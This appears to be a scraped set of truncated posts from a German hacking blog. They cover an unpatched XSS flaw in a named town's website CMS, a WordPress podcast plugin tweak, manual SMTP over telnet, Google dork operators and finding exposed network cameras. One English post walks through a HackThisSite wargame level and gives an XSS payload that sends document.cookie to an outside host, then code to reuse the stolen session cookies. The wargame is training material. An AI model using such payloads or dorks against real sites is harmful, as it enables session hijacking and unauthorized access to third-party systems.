hack1n9

Jaja die große Kreisstadt Kirchheim unter Teck ! leider leider setzen diese Herren und Damen auf ein CMS, webios, welches Grundsätzlich, nach meiner Subjektiven Meinung, nicht zu empfehlen ist ;) Also kurzum ich mag es einfach nicht *gg* Nur weil ich persönlich etwas nicht gut finde reicht es sicher noch lange nicht für einen Blog Beitrag. Leider besitzt dass CMS welches die Stadt verwendet in der Suchfunktion eine XSS Lücke. '> Die Seite der Stadt Kirchheim unter teck Dadurch lassen sich Inhalte einblenden etc pp. Bekommt man einen Angestellten dazu auf einen Manipulierten Link zu klicken so bekommt man sogar editor Rechte. Nunja soviel dazu. Nach dem diese Lücke sowas von offensichtlich ist habe ich mich auf den Seiten des CMS herstellers umgeschaut. Dieses CMS ist auch als Online Shop Version zu bekommen. Im Demo Shop waren /Suche/Anmeldung anfällig für SQL-injection. Neuerdings benötigt man für die Benutzung der Demo Software einen Demo Account ;) ...

Hier möchte ich nun einen kleinen Workaround oder Hack vorstellen um das Pdcasting Plugin für Wordpress von Heft um einen zusätzlichen Dateityp erweitern kann um mehrere Formate für seine User im Podcast feed anbieten möchte. Standardmäßig unterstützt Podcasting das Format mp3. Dass sollte auf jeden Fall im Podcast drin bleiben denn der Flash Player unterstützt mp3 Dateien ogg aber nicht. Ich stelle auf der Plugin Seite eine Modifizierte Version zum Download bereit. Porbleme welche die unterstützung der ogg files betreffen können gerne an mich weitergereicht werden. Alle anderen Probleme an Ronald Heft. Hier gehts zum Orginal Podcasting Plugin Hier gehts zur Modifizierten Plugin Seite Auf der Seite werden die änderungen im Code vorgestellt und es gibt auch ne Demo für den Stream. Getestet mit den Wordpress Versionen 2.5 und 2.6.

Here are the javascript codes for HTS Level 9: 1. code, take a look at the cookie: javascript:alert(document.cookie); 2. The xss exploit insert into the message to mr. crap: </textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script> 3. The code to use the stolen cookie data: javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1"; Now you can move the money!! 4. Deleting the session data. Log out and go to the main page of crappy soft. Go to the mailing list form. Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page: http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html But it is written in german. The faste...

So nun vielleicht kann es ja mal jemand gebrauchen. Auf jeden Fall ist es ein schneller Weg um emails auf der Konsole zu versenden. Sendmail lauscht auf dem Port 25 und da kann man sich einfach mal mit der Konsole hinverbinden via telnet. Hier mal mit dem localhost: telnet 127.0.0.1 25 Server Antwort : 200; (OK) HELO localhost (sonst domainamen) Server Antwort: 250;(OK) MAIL FROM: blabla@domainirgendwas.de/com/net/org/gov Server Antwort: 250 2.1.0 blabla@domainirgendwas.de/com/net/org/go... Sender ok RCPT TO: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Server Antwort: 250 2.1.5 xxxxxxxxxxxxxxx... Recipient ok DATA Server Antwort: 354 Enter mail, end with "." on a line by itself Hallo ich bin eine Email. ---//\\--- ---------- --///\\\-- HUHU bis dann . Server Antwort: 250 2.0.0 Message accepted for delivery QUIT Server Antwort: 221 2.0.0 noname closing connection Connection closed by foreign host. --Verbindung beendet So das war alles. Das ganze ist nicht "case sensitive...

Nun der erste Beitrag zum Google hacking war wohl etwas zu oberflächlich gehalten. Dieser Beitrag ist für Administratoren und Netzwerkverantwortliche gedacht damit man seine Netzwerke absichern und aber auch sein eigenes Netzwerk testen kann. Google Hacking ist recht simpel. Man muss sich nur die erweiterten Suchbegriffe anschauen: link google erweiterte Suchbefehle . = jeder Buchstabe * = jedes Wort .. = Numerische Suche 5..8 findet alle Zahlen zwischen 5 und 8 sinnvoll bei Versionssuche macht aber in der Praxis noch Probleme. Suchoperatoren mit grundlegendem aufbau: operator:suchstring site:google.de = findet alles auf der Seite google.de filetype:vbs = findet nur *.vbs dateien link:cgi = findet alles mit cgi im link cache:site = findet alles im googlecache von einer bestimmten Seite intitle:string = findet alles mit string im Titel inurl:string = findet alles mit string in der url Was kann man mit google hacking alles finden und was muss ich eingeben um blabla zu finde. Eine liste...

(Abbildung zeigt Webcam von einer Werkstatt) Moderne Hardware macht einem Administrator die Arbeit leicht und angenehm. Drucker sind halbe Computer geworden, besitzen Web Server, ftp, snmp, und viele weitere features. Das erleichtert einem die Verwaltung. Man kann vom Büro aus nachschauen ob der Drucker wirklich gerade hängt oder ob die Büro Fuzzis einfach vergessen haben Papier nachzufüllen. Das spart ärger und nerven. Aber auch für den Otto Normal Verbraucher bringt das vorteile. Die Netzwerkkamera ist im Handumdrehen angeschlossen und die Verwaltung geht auch leicht von der Hand. Entweder mit einer speziellen Software vom Hersteller oder aber auch über die Integrierten Web Server. Diese dinge gehen so leicht von der Hand dass der Anwender wie auch manch ein Administrator sich keine großen Gedanken macht ob und wie die Geräte von aussen zu erreichen sind. Mit hilfe von google lassen sich so mache Geräte in Netzwerken von Firmen und Universitäten aufsuchen. So stellt auch die Firma HY...